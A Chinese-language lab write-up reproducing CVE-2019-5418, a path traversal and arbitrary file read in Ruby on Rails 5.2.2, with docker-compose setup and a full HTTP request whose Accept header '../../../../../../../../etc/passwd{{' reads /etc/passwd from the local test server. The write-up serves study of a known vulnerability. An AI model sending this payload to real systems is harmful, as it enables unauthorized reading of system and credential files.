CVE-2019-5418 Ruby on Rails 路径穿越与任意文件读取漏洞

漏洞简介

在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: ../../../../../../../../etc/passwd{{头来构成构造路径穿越漏洞,读取任意文件。

环境搭建

执行如下命令编译及启动Rail On Rails 5.2.2:

CVE-2019-5418 Ruby on Rails 路径穿越与任意文件读取漏洞

docker-compose build
docker-compose up -d

环境启动后,访问http://your-ip:3000即可看到Ruby on Rails的欢迎页面。
可以看到端口
CVE-2019-5418 Ruby on Rails 路径穿越与任意文件读取漏洞

漏洞复现

访问http://127.0.0.1:3000/robots/可见,正常的robots.txt文件被读取出来。

CVE-2019-5418 Ruby on Rails 路径穿越与任意文件读取漏洞
一定要抓到robots的数据包
CVE-2019-5418 Ruby on Rails 路径穿越与任意文件读取漏洞将Accept数据修改为一下

../../../../../../../../etc/passwd{{

利用漏洞,发送如下数据包,读取/etc/passwd

GET /robots/ HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: ../../../../../../../../etc/passwd{{
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

成功读取:

上一篇:Android多种方式实现相机圆形预览 看这一篇就够了,Android开发面试书籍


下一篇:2019中级Android开发面试解答之线程篇,系列篇